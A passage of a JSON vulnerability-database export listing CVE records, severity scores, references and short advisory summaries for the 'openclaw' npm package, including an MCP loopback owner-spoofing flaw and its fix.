"https://api.first.org/data/v1/epss?cve=CVE-2026-35655", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14671", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14635", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14677", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35655" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:16Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/e4c61723cd2d530680cc61789311d464ab8cdf60", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:16Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/e4c61723cd2d530680cc61789311d464ab8cdf60" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-74wf-h43j-vvmj", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:16Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-74wf-h43j-vvmj" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35655", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35655" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-identity-spoofing-via-rawinput-tool-in-acp-permission-resolution", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:16Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-identity-spoofing-via-rawinput-tool-in-acp-permission-resolution" }, { "reference_url": "https://github.com/advisories/GHSA-74wf-h43j-vvmj", "reference_id": "GHSA-74wf-h43j-vvmj", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-74wf-h43j-vvmj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35655", "GHSA-74wf-h43j-vvmj" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rswr-nd6z-vuhe" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91952?format=api", "vulnerability_id": "VCID-ry1r-br3q-2uaw", "summary": "OpenClaw: MCP loopback owner context is derived from server-issued bearer tokens\n## Summary\nMCP loopback owner context is derived from server-issued bearer tokens.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nThe loopback MCP path accepted spoofable owner-context metadata from request headers, which could allow a non-owner loopback client to present itself as owner for owner-gated operations.\n\n## Fix\nThe MCP loopback runtime now issues separate owner and non-owner bearer tokens and derives senderIsOwner exclusively from which token authenticated the request. The spoofable sender-owner header is no longer emitted or trusted.\n\n## Fix Commit(s)\n- 3cb1a56bfc9579a0f2336f9cfa12a8a744332a19\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @VladimirEliTokarev for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44118", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01838", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01843", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02646", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44118" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/3cb1a56bfc9579a0f2336f9cfa12a8a744332a19", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T17:21:33Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/3cb1a56bfc9579a0f2336f9cfa12a8a744332a19" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-r6xh-pqhr-v4xh", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T17:21:33Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-r6xh-pqhr-v4xh" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44118", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44118" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-owner-context-spoofing-via-bearer-token-header", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T17:21:33Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-owner-context-spoofing-via-bearer-token-header" }, { "reference_url": "https://github.com/advisories/GHSA-r6xh-pqhr-v4xh", "reference_id": "GHSA-r6xh-pqhr-v4xh", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r6xh-pqhr-v4xh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114466?format=api", "purl": "pkg:npm/openclaw@2026.4.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22" } ], "aliases": [ "CVE-2026-44118", "GHSA-r6xh-pqhr-v4xh" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ry1r-br3q-2uaw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89294?format=api", "vulnerability_id": "VCID-s3wz-3yzf-ybhz", "summary": "OpenClaw: Voice-call Plivo replay mutates in-process callback origin before replay rejection\n## Summary\nVoice-call Plivo replay mutates in-process callback origin before replay rejection\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: v2026.3.28 can still mutate Plivo callback origin before replay rejection, but this needs a captured valid callback for a live call so medium is overstated.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `efe9183f9d2fd5e01c8068fa01f4a07a58a63c0b` — 2026-03-31T19:50:35+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zsxsoft for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41337", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00037", "scoring_system": "epss", "scoring_elements": "0.11472", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00037", "scoring_system": "epss", "scoring_elements": "0.11506", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00037", "scoring_system": "epss", "scoring_elements": "0.11508", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41337" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/efe9183f9d2fd5e01c8068fa01f4a07a58a63c0b", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:28:16Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/efe9183f9d2fd5e01c8068fa01f4a07a58a63c0b" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-89r3-6x4j-v7wf", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:28:16Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-89r3-6x4j-v7wf" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41337", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": 